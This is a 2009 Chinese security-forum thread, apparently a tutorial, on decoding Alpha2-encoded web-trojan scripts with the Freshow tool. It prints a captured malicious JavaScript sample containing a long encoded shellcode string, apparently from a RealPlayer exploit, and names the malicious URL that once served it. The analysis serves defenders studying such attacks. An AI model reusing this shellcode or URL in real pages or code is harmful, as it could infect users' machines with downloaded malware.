瑞星卡卡安全论坛技术交流区恶意网站交流 网马解密大讲堂——网马解密中级篇(Alpha2篇)

123   1  /  3  页   跳转

网马解密大讲堂——网马解密中级篇(Alpha2篇)

网马解密大讲堂——网马解密中级篇(Alpha2篇)

卡卡讲堂之网马解密 初级篇
卡卡讲堂之网马解密 中级篇
卡卡讲堂之网马解密 高级篇(swf网马解密)
卡卡讲堂之网马解密 高级篇(pdf网马解密)
1.Freshow解密工具的详细用法
2.网马解密之——Eval篇
3.网马解密之——Document.write篇
4.网马解密之——Alpha2篇
5.网马解密之——Shellcode篇
6.网马解密之——Base64篇
7.网马解密之——US-ASCII篇
8.浅谈eval解密之——工具篇



引用:

Alpha2是Realplay漏洞多采用此加密方式,该加密方式特征:

代码开头:TYIIIIIIIIIIIIIIII

一般情况下在网马解密过程中,在获取的恶意网址源代码中,代码开头有上述类似代码,使用得加密方式即为alpha2。


下面我们将结合实例讲解alpha2解密方法,我们先来看一个典型的alpha2加密的网马代码:


var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\testSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];
ShellCode="";
ShellCode=ShellCode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI";
ShellCode=ShellCode+"xkR0qJPJP3YY0fNYwLEQk0p47zpf"+"KRKJJKVe9xJKYoIoYolOoCQv";
ShellCode=ShellCode+"3VsVwLuRKwRva"+"vbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB";
ShellCode=ShellCode+"sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO";
ShellCode=ShellCode+"NuKpTRr"+"NWOVYM5m"+"qqrwSMTn"+"oeoty08JM"+"nKJMgPw2p"+"ey5MgMWQuMw";
ShellCode=ShellCode+"runOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCX";
ShellCode=ShellCode+"HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQK";
ShellCode=ShellCode+"e6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI";
ShellCode=ShellCode+"5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQ";
ShellCode=ShellCode+"OjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL";
ShellCode=ShellCode+"gOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5";
ShellCode=ShellCode+"PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcEN";
ShellCode=ShellCode+"eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw";
ShellCode=ShellCode+"2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW";
ShellCode=ShellCode+"qvRHptd4RPFZVOdoSXQqrORXQy0a6QP86NPcbOpmTo1hsYu14oPfFUTnU3PspsOpgp";


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
最后编辑networkedition 最后编辑于 2009-05-21 14:53:34
分享到:
gototop
 

回复:网马解密大讲堂——网马解密中级篇(Alpha2篇)

我们将上述代码,复制粘贴至freshow的上操作区域,相见下列截图:



http://www.baidu163sinasohu.cn/sina/real.js这个恶意网址源代码内容为上述代码,由于恶意网址的时效性,这个恶意网址已经失效,我将此js脚本源代码已保存,直接使用源代码来讲解,并不影响我们的讲解。
最后编辑networkedition 最后编辑于 2009-05-18 13:17:46
gototop
 

回复:网马解密大讲堂——网马解密中级篇(Alpha2篇)

接下来我们要将此代码处理一下,去掉没有用的部分。相见下列截图:




大的红色框里内容为处理后源代码,实际就是将shellcode部分保留,删除其余无效代码内容。
最后编辑networkedition 最后编辑于 2009-05-18 13:25:02
gototop
 

回复:网马解密大讲堂——网马解密中级篇(Alpha2篇)

接下来我们选择解密选项为alpha2,点击decode进行一次解密,解密后内容会显示在下操作区域,点击up按钮将下操作区域代码上翻至上操作区域,进行二次解密,解密选项选择esc,点击decode进行二次解密,获得网马下载地址,请见下列截图:


最后编辑networkedition 最后编辑于 2009-05-18 13:33:44
gototop
 

回复:网马解密大讲堂——网马解密中级篇(Alpha2篇)

本帖被评分 2 次
最后编辑networkedition 最后编辑于 2009-05-18 13:34:25
gototop
 

回复:网马解密大讲堂——网马解密中级篇(Alpha2篇)

继续努力
gototop
 

回复:网马解密大讲堂——网马解密中级篇(Alpha2篇)

这么好的文章没有人顶
0.电脑安防交流群:79272952
1.下载windows清理助手,升级后清理系统。
  地址:http://download.arswp.com/arswp3/x86/arswp3_x86.zip
2.下载SREng,地址:http://download.kztechs.com/files/sreng2.zip
3.解压后运行SREngLdr.exe---智能扫描---扫描---保存报告。
4.将SREng.log日志文件压缩后上传。。
gototop
 

回复:网马解密大讲堂——网马解密中级篇(Alpha2篇)

上课坐后排
gototop
 

回复:网马解密大讲堂——网马解密中级篇(Alpha2篇)

学习了,以前是一知半懂,现在才明白
gototop
 

回复:网马解密大讲堂——网马解密中级篇(Alpha2篇)

Realplay的漏洞现在比较少见了,大部分挂马的都使用Flash漏洞了。
gototop
 
123   1  /  3  页   跳转
页面顶部
Powered by Discuz!NT